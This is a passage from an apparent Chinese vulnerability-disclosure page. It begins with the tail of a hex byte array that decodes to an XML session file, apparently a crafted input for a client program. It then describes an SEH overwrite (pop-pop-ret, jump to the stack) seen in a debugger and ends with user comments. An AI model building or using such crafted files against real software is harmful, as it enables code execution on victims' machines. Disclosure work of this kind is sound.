0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75,
0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22,
0x74, 0x61, 0x62, 0x77, 0x69, 0x64, 0x74, 0x68,
0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D,
0x22, 0x34, 0x38, 0x32, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x72, 0x65, 0x6D, 0x6F, 0x74, 0x65, 0x68,
0x65, 0x69, 0x67, 0x68, 0x74, 0x22, 0x20, 0x76,
0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x37, 0x32,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x73, 0x6F, 0x72,
0x74, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x30, 0x2B, 0x30, 0x2B, 0x30, 0x2B,
0x30, 0x2B, 0x30, 0x2B, 0x30, 0x2B, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x73, 0x69, 0x74, 0x65, 0x73,
0x69, 0x7A, 0x65, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x6D, 0x6F, 0x6E, 0x69, 0x74, 0x6F, 0x72,
0x66, 0x6F, 0x6E, 0x74, 0x22, 0x20, 0x76, 0x61,
0x6C, 0x75, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75,
0x72, 0x69, 0x65, 0x72, 0x20, 0x6E, 0x65, 0x77,
0x2C, 0x38, 0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x66,
0x6F, 0x6E, 0x74, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75, 0x72,
0x69, 0x65, 0x72, 0x20, 0x6E, 0x65, 0x77, 0x2C,
0x38, 0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75,
0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22,
0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x66, 0x6F,
0x6E, 0x74, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75, 0x72, 0x69,
0x65, 0x72, 0x20, 0x6E, 0x65, 0x77, 0x2C, 0x38,
0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x65,
0x64, 0x69, 0x74, 0x66, 0x6F, 0x6E, 0x74, 0x22,
0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22,
0x63, 0x6F, 0x75, 0x72, 0x69, 0x65, 0x72, 0x20,
0x6E, 0x65, 0x77, 0x2C, 0x38, 0x2C, 0x30, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61,
0x6D, 0x65, 0x3D, 0x22, 0x6D, 0x73, 0x67, 0x66,
0x6F, 0x6E, 0x74, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x75, 0x72,
0x69, 0x65, 0x72, 0x20, 0x6E, 0x65, 0x77, 0x2C,
0x38, 0x2C, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x3C, 0x74, 0x61, 0x73, 0x6B, 0x73,
0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65,
0x3D, 0x22, 0x31, 0x31, 0x31, 0x31, 0x31, 0x31,
0x31, 0x30, 0x30, 0x30, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F, 0x6C,
0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6D, 0x65, 0x6E, 0x75, 0x22, 0x20,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22,
0x30, 0x2C, 0x30, 0x2C, 0x31, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F,
0x6C, 0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x61, 0x64, 0x64, 0x72, 0x65,
0x73, 0x73, 0x22, 0x20, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x3D, 0x22, 0x33, 0x2C, 0x30, 0x2C,
0x31, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x70,
0x72, 0x6F, 0x6D, 0x70, 0x74, 0x73, 0x22, 0x20,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22,
0x32, 0x2C, 0x31, 0x39, 0x38, 0x2C, 0x31, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x74,
0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x73, 0x74, 0x61,
0x6E, 0x64, 0x61, 0x72, 0x64, 0x22, 0x20, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31,
0x2C, 0x30, 0x2C, 0x31, 0x2C, 0x31, 0x2C, 0x30,
0x2C, 0x32, 0x2C, 0x33, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F, 0x6C,
0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x71, 0x75, 0x65, 0x75, 0x65, 0x22,
0x20, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D,
0x22, 0x31, 0x2C, 0x38, 0x35, 0x2C, 0x31, 0x2C,
0x35, 0x2C, 0x36, 0x2C, 0x31, 0x36, 0x2C, 0x30,
0x2C, 0x38, 0x2C, 0x37, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F, 0x6F, 0x6C,
0x62, 0x61, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x63, 0x6F, 0x6D, 0x6D, 0x61, 0x6E,
0x64, 0x73, 0x22, 0x20, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C, 0x32, 0x31,
0x36, 0x2C, 0x31, 0x2C, 0x39, 0x2C, 0x31, 0x30,
0x2C, 0x31, 0x31, 0x2C, 0x31, 0x32, 0x2C, 0x31,
0x33, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x74,
0x6F, 0x6F, 0x6C, 0x73, 0x22, 0x20, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C,
0x33, 0x34, 0x31, 0x2C, 0x31, 0x2C, 0x31, 0x34,
0x2C, 0x31, 0x35, 0x2C, 0x32, 0x32, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x74, 0x6F,
0x6F, 0x6C, 0x62, 0x61, 0x72, 0x20, 0x6E, 0x61,
0x6D, 0x65, 0x3D, 0x22, 0x73, 0x65, 0x61, 0x72,
0x63, 0x68, 0x22, 0x20, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C, 0x34, 0x32,
0x30, 0x2C, 0x31, 0x2C, 0x31, 0x37, 0x2C, 0x31,
0x38, 0x2C, 0x31, 0x39, 0x2C, 0x30, 0x2C, 0x32,
0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x63,
0x75, 0x73, 0x74, 0x6F, 0x6D, 0x22, 0x20, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31,
0x2C, 0x35, 0x32, 0x38, 0x2C, 0x31, 0x2C, 0x32,
0x31, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x74, 0x6F, 0x6F, 0x6C, 0x62, 0x61, 0x72,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x74,
0x61, 0x73, 0x6B, 0x73, 0x22, 0x20, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x31, 0x2C,
0x31, 0x2C, 0x30, 0x2C, 0x30, 0x2C, 0x30, 0x2C,
0x30, 0x2C, 0x39, 0x35, 0x36, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x75, 0x70, 0x64,
0x61, 0x74, 0x65, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x73, 0x79, 0x6E, 0x63, 0x22, 0x20,
0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x34,
0x31, 0x33, 0x36, 0x37, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x3C, 0x2F, 0x73, 0x65, 0x73, 0x73,
0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A
通过调试器打开应用程序,在地址栏选择地址并连接

.PNG


当程序异常时,可以看到SEH处理函数已被覆盖为pop pop ret

.PNG


并且顺利执行到栈中的跳转指令

.PNG

修复方案:

版权声明:转载请注明来源 cssembly@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2013-04-03 11:56 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    洞主 乌云众测可以了解一下哟

  2. 2013-04-03 12:35 | cssembly ( 普通白帽子 | Rank:202 漏洞数:23 | 天资不足,勤奋有余!)

    @xsser 哎。。。不懂网站漏洞,努力向大神们学习中。。。。。。

  3. 2013-04-03 12:56 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    @cssembly 有些测试中,也有会客户端相关的东西的:)

  4. 2013-04-03 12:57 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    这软件我貌似一直在用。

  5. 2013-04-03 13:15 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @cssembly 谁说众测就是网站的 现在系统都是一个整体吧

  6. 2013-04-03 15:27 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @心伤的瘦子 瘦子的粉丝比二哥多啊,超神了

  7. 2013-04-07 09:02 | lmstz ( 路人 | Rank:6 漏洞数:2 | SongTianZuo)

    @yy520 有复现出来了吗

  8. 2013-04-07 22:25 | yy520 ( 普通白帽子 | Rank:139 漏洞数:12 )

    @lmstz 女神求交流

  9. 2013-04-15 18:49 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @lmstz 这是女神?

  10. 2013-04-16 23:23 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @lmstz @xsser 妹夫,这是狼妹宋天琢

  11. 2013-07-02 12:24 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    洞主在么,最近有一个客户端的众测啊

  12. 2013-07-02 13:41 | Sunshine ( 实习白帽子 | Rank:51 漏洞数:9 | Nothing.)

    @xsser 我建议把洞主那些被忽略的漏洞给评 些rank吧?